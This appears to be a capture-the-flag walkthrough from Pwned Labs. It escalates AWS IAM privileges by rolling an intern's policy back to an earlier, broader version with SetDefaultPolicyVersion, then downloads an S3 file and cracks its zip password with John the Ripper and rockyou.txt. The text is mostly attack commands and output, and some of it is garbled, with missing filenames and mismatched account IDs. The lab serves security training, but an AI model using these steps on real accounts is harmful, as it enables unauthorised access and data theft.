Escalate Privileges by IAM Policy Rollback

A walkthrough demonstrating how to abuse the IAM permission: SetDefaultPolicyVersion

CTF Source: Pwned Labs


In this walkthrough, we're provided access keys for an Intern with seemingly little access, but we find a way to escalate our privileges and obtain access to sensitive data!


  • Install awscli: brew install awscli (mac) apt install awscli (linux)

  • Install JohnTheRipper: brew install john (mac) apt intall john (linux)


After configuring our AWS access keys (⁠aws configure⁠), let's begin to enumerate our access.

This command tells us who we are.

aws sts get-caller-identity

    "Account": "831057696777",
    "Arn": "arn:aws:iam::831057696777:user/intern01"

We can then list policies attached to this user.

aws iam list-attached-user-policies --user-name intern01  
    "AttachedPolicies": [
            "PolicyName": "intern_policy",
            "PolicyArn": "arn:aws:iam::214768663777:policy/intern_policy"

Let's see if we have multiple versions of this policy.

aws iam list-policy-versions --policy-arn arn:aws:iam::214768663777:policy/intern_policy

    "Versions": [
            "VersionId": "v2",
            "IsDefaultVersion": true,
            "CreateDate": "2024-03-14T23:00:42+00:00"
            "VersionId": "v1",
            "IsDefaultVersion": false,
            "CreateDate": "2024-03-14T23:00:41+00:00"

We can view both policies like so: aws iam get-policy-version --policy-arn arn:aws:iam::214768663777:policy/intern_policy --version-id v1 (or v2).

aws iam get-policy-version --policy-arn arn:aws:iam::831057696777:policy/intern_policy --version-id v1

    "PolicyVersion": {
        "Document": {
            "Statement": [
                    "Action": [
                    "Effect": "Allow",
                    "Resource": "*"
            "Version": "2012-10-17"
        "VersionId": "v1",
        "IsDefaultVersion": false,
        "CreateDate": "2024-03-14T21:43:51+00:00"

Escalating Privileges

The v1 policy gives us some additional S3 permissions over all resources. We'll set this version as our policy.

aws iam set-default-policy-version --policy-arn 
arn:aws:iam::831057696777:policy/intern_policy --version-id v1

If we list the buckets in the account, we'll find one and download the data.

aws s3 ls    
2024-03-14 15:43:52 huge-logistics-data-8344bf3ad538
aws s3 cp s3://huge-logistics-data-8344bf3ad538/ .

download: s3://huge-logistics-data-8344bf3ad538/ to ./

Password Cracking

Unfortunately, the file is password-protected.


[] amex-export.json password:   

Not to worry as we can attempt to crack the password.

We'll create a hash and save it to a new file.

zip2john > hash.txt

Next, we'll use JohnTheRipper and the classic rockyou.txt password list.

john hash.txt --wordlist=rockyou.txt

1logistics       (  

Finding the Flag!

We found the password! Attempting to unzip the file with this password results in discovering the flag!

unzip -P 1logistics 

  inflating: amex-export.json        
 extracting: flag.txt  

Get the final flag.

cat flag.txt      

Last updated